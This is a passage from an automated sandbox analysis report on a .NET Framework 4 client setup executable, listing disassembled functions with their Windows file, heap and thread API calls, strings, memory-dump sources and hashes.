                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_memmove
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1268875249-3916222277
                                                                                                                                                                    • Opcode ID: 7281ecfdba60d79ab0859f5d58c8de7fae80317cc80739e0d6177210195faec5
                                                                                                                                                                    • Instruction ID: 1dfb16369be20d2b619ce7ac09ad119fbcb69ba72740b89f367d3237678963fa
                                                                                                                                                                    • Opcode Fuzzy Hash: 7281ecfdba60d79ab0859f5d58c8de7fae80317cc80739e0d6177210195faec5
                                                                                                                                                                    • Instruction Fuzzy Hash: F2513B71E002599BDF14DFA8DC81AEEB7F5FF48354F244529EC55A7242D730AE818BA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000164D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000080,?,00000024,?,0001AFDF,00000007,?,?,00000000,00000000,?,?,?), ref: 00016560
                                                                                                                                                                    Strings
                                                                                                                                                                    • Unable ro register file for clean-up, xrefs: 00016574
                                                                                                                                                                    • User canceled extraction..., xrefs: 000165BB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID: Unable ro register file for clean-up$User canceled extraction...
                                                                                                                                                                    • API String ID: 3188754299-368570184
                                                                                                                                                                    • Opcode ID: 89ca71b1b3ddf46cd1afe99cdaa6ed5b2303eff3d9075057a96a0352ab0d64df
                                                                                                                                                                    • Instruction ID: c953a033a0cfd04b4ac4e565d1379915fcb9d6d12fd892618d4915a1ebd68a43
                                                                                                                                                                    • Opcode Fuzzy Hash: 89ca71b1b3ddf46cd1afe99cdaa6ed5b2303eff3d9075057a96a0352ab0d64df
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A219031504A24DBDF12AF60EC56ADE37A7BB05B60F118415F901E611AEB33E8E0DB95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00019CFE Relevance: 5.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019CA3: CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
                                                                                                                                                                    • GetLastError.KERNEL32(?,80000000,00000007,00000003,08000080,00000000,?,?,?,?,000160C2,?,?,00000000,00000000), ref: 00019D29
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010,?,80000000,00000007,00000003,08000080,00000000,?,?,?,?,000160C2,?,?,00000000), ref: 00019D52
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 00019D59
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 00019DB2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseCreateErrorFileHandleLastProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3300431839-0
                                                                                                                                                                    • Opcode ID: 10a1014585d3d378e45aa7d3343a81f98e661e3b652796dac3a759719230de6c
                                                                                                                                                                    • Instruction ID: d640c6ee675c4cc42fd4ca5883cf7d2121f94960bb2674f4e7a4cacd0ba140b9
                                                                                                                                                                    • Opcode Fuzzy Hash: 10a1014585d3d378e45aa7d3343a81f98e661e3b652796dac3a759719230de6c
                                                                                                                                                                    • Instruction Fuzzy Hash: A111E732D00621ABD7315B78AC157DDBAA09F45770F228320EE65AB2D1DB75DD8187D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000336DB Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd_noexit.LIBCMT ref: 000336E0
                                                                                                                                                                      • Part of subcall function 0002A6D5: GetLastError.KERNEL32(00000001,00000000,0002B05E,0002CE3E,00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8), ref: 0002A6D9
                                                                                                                                                                      • Part of subcall function 0002A6D5: ___set_flsgetvalue.LIBCMT ref: 0002A6E7
                                                                                                                                                                      • Part of subcall function 0002A6D5: __calloc_crt.LIBCMT ref: 0002A6FB
                                                                                                                                                                      • Part of subcall function 0002A6D5: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8,?,?,?,0002A803), ref: 0002A715
                                                                                                                                                                      • Part of subcall function 0002A6D5: GetCurrentThreadId.KERNEL32 ref: 0002A72B
                                                                                                                                                                      • Part of subcall function 0002A6D5: SetLastError.KERNEL32(00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8,?,?,?,0002A803), ref: 0002A743
                                                                                                                                                                    • __freeptd.LIBCMT ref: 000336EA
                                                                                                                                                                      • Part of subcall function 0002A8A6: TlsGetValue.KERNEL32(?,?,000336EF,00000000,?,00033720,00000000), ref: 0002A8C7
                                                                                                                                                                      • Part of subcall function 0002A8A6: TlsGetValue.KERNEL32(?,?,000336EF,00000000,?,00033720,00000000), ref: 0002A8D9
                                                                                                                                                                      • Part of subcall function 0002A8A6: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(00000000,?,000336EF,00000000,?,00033720,00000000), ref: 0002A8EF
                                                                                                                                                                      • Part of subcall function 0002A8A6: __freefls@4.LIBCMT ref: 0002A8FA
                                                                                                                                                                      • Part of subcall function 0002A8A6: TlsSetValue.KERNEL32(0000000E,00000000,?,000336EF,00000000,?,00033720,00000000), ref: 0002A90C
                                                                                                                                                                    • ExitThread.KERNEL32 ref: 000336F3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$DecodeErrorInternal@4LastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 68672458-0
                                                                                                                                                                    • Opcode ID: 87a3b7ac6700a88f9fa20675caadfdfd035d2a9ab6cf1ef57fb069a1a00a4ae5
                                                                                                                                                                    • Instruction ID: 3bbfbb42582c56d9101712722843c1586d1a44e80ba6b8df17b6a244ec7cd40c
                                                                                                                                                                    • Opcode Fuzzy Hash: 87a3b7ac6700a88f9fa20675caadfdfd035d2a9ab6cf1ef57fb069a1a00a4ae5
                                                                                                                                                                    • Instruction Fuzzy Hash: 11C08C306006046FDA113B21BC0FE8A3A4D8F80350B048020B80482213DEA8E8418065
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00027EC4 Relevance: 3.8, APIs: 3, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 00027EE9
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00027F09
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00027F29
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2978645861-0
                                                                                                                                                                    • Opcode ID: f09edd98ddd450f4e728b61bfb8c386fb7ba9d689cf60ffacc35486f2bdad275
                                                                                                                                                                    • Instruction ID: 7aae96eefc9107c2ef594720d17244c460fa10a682ae5355cfca1f356442f85f
                                                                                                                                                                    • Opcode Fuzzy Hash: f09edd98ddd450f4e728b61bfb8c386fb7ba9d689cf60ffacc35486f2bdad275
                                                                                                                                                                    • Instruction Fuzzy Hash: A5115B75A00305EFCB50CF98D944A9ABBB9FF48310F248459F61597240D774EA14CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00016A1B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DialogBoxParamA.USER32(00000081,00000000,00016A56,00000000), ref: 00016A32
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed while running the progress dialog., xrefs: 00016A3E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DialogParam
                                                                                                                                                                    • String ID: Failed while running the progress dialog.
                                                                                                                                                                    • API String ID: 665744214-2908255965
                                                                                                                                                                    • Opcode ID: cf4e2e377e2143411547359140dbbe865cb833fadf9c8a1740ed19cdfa5e7fb6
                                                                                                                                                                    • Instruction ID: 480aaa31e88d2d31611429197cc91db2dfb031abb8c07d66f1e0fb73243fc125
                                                                                                                                                                    • Opcode Fuzzy Hash: cf4e2e377e2143411547359140dbbe865cb833fadf9c8a1740ed19cdfa5e7fb6
                                                                                                                                                                    • Instruction Fuzzy Hash: 9ED0A732784730B6E63652147C06FC61E54AF40B60F11C011F704FA1D09DA599C186CC
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001F95E Relevance: 3.5, APIs: 2, Instructions: 504COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0001F965
                                                                                                                                                                      • Part of subcall function 00022C43: __CxxThrowException@8.LIBCMT ref: 00022C6A
                                                                                                                                                                      • Part of subcall function 00022C43: _memmove.LIBCMT ref: 00022CBB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8H_prolog3Throw_memmove
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3426943727-0
                                                                                                                                                                    • Opcode ID: d5426c61231117250f66092ec06d0a6376cdccf9516abecc919e557e74e63f39
                                                                                                                                                                    • Instruction ID: 30111b1bdb6d3149682825825ec3ce929803ba5b2db3e4b0708b5aa88553ef99
                                                                                                                                                                    • Opcode Fuzzy Hash: d5426c61231117250f66092ec06d0a6376cdccf9516abecc919e557e74e63f39
                                                                                                                                                                    • Instruction Fuzzy Hash: 81322271508386DFC370DF68C484ADEBBE4BF89304F54492EE9898B252DB70A985CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001A222 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 149stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00000000,000000FF), ref: 0001A33B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                    • String ID: (
                                                                                                                                                                    • API String ID: 1659193697-3887548279
                                                                                                                                                                    • Opcode ID: 7181a779fa216a9ea61e02d4527f27748b8d8acfc0481244eb2ec0d38420c66c
                                                                                                                                                                    • Instruction ID: d770fb5fb2414ca9e062c6d2bbe25915e860efb685b0f19bb0a391a9e4f3094e
                                                                                                                                                                    • Opcode Fuzzy Hash: 7181a779fa216a9ea61e02d4527f27748b8d8acfc0481244eb2ec0d38420c66c
                                                                                                                                                                    • Instruction Fuzzy Hash: E2516531A01215DFCB25DFA4C8917EDB7B1AF06320F15416AE815BB252DB319FC5CB92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B3F5 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,00000000,?), ref: 0001B443
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001B452
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 8ae514943a29f1e75311168a75ac6fa222f854c0426c12bdfc0f52250d10b365
                                                                                                                                                                    • Instruction ID: cd43ccdb93b5ac377bc6536cbf455bcd3a0ec65e43bf56ff2a0e4f7223ce516d
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ae514943a29f1e75311168a75ac6fa222f854c0426c12bdfc0f52250d10b365
                                                                                                                                                                    • Instruction Fuzzy Hash: 4A11C276A00315DFEB108F99DCC09E577A5BF85328B158239EA24C7263C775DC85DB80
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B296 Relevance: 3.1, APIs: 2, Instructions: 54fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0001B2B9
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001B2C6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1214770103-0
                                                                                                                                                                    • Opcode ID: f5044bb84b5755f5a5ac75a87694be2f29f932d0d44e8b25c15797696ccc20d2
                                                                                                                                                                    • Instruction ID: 55a8cc34466fb38195dba3c1a434caf2123798c2a7474897fcf7f6d3e8eb955e
                                                                                                                                                                    • Opcode Fuzzy Hash: f5044bb84b5755f5a5ac75a87694be2f29f932d0d44e8b25c15797696ccc20d2
                                                                                                                                                                    • Instruction Fuzzy Hash: C501C436A411206FE3258B1ADC04FAA7B68EB86770F154254FE15AB3D2C735EC4196D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B32B Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0001B34B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001B355
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1948546556-0
                                                                                                                                                                    • Opcode ID: ece12e119eef233f518ddbb98011e656335a3e509d9a89abd8b98b26712b1c7b
                                                                                                                                                                    • Instruction ID: cffea3c198f70f0df70f899c17f5380f73e3fb1d176dbc8f6f6e3652dfa24a4c
                                                                                                                                                                    • Opcode Fuzzy Hash: ece12e119eef233f518ddbb98011e656335a3e509d9a89abd8b98b26712b1c7b
                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF09073D01179EBEB128F91DD049EA7B68AF457B4B014224BE20E7261D779DE10A7D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B390 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0001B3B0
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001B3BA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                                    • Opcode ID: 7f6c4156ad109a7641a752b99138d0746db096e178f3c6b620daa149470a2a68
                                                                                                                                                                    • Instruction ID: 4df6555ce8feb5718121daeedfc0006a311c5551f1ece1f431f4a1f14898dc46
                                                                                                                                                                    • Opcode Fuzzy Hash: 7f6c4156ad109a7641a752b99138d0746db096e178f3c6b620daa149470a2a68
                                                                                                                                                                    • Instruction Fuzzy Hash: 2EF09633D11139ABDB11CF90DD049DA7A68AF41774B024264BE20F7150E375DE1097D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00019663 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(00000000,00015E5F,00000000,?,?,00015E5F), ref: 00019682
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00015E5F), ref: 0001968C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentDirectoryErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 152501406-0
                                                                                                                                                                    • Opcode ID: c7a72e3414ae07fb12e8224859b3bdbd8205004a0ae793badcf06507efa65653
                                                                                                                                                                    • Instruction ID: 4a9a48a7fe1f39b4c819faf213314ac09e5de3aa3943d54854832d257a66a704
                                                                                                                                                                    • Opcode Fuzzy Hash: c7a72e3414ae07fb12e8224859b3bdbd8205004a0ae793badcf06507efa65653
                                                                                                                                                                    • Instruction Fuzzy Hash: 87F0E233C01136FBDB215795CD29BCDBAA49F10764F224174AE00B7110D73ACE80D6E4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00019B6A Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00019B82
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 00019B8C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 03296a67499aa7a0b2c5aad6268a5807e9f771368e05952f1dd8ba63c755d488
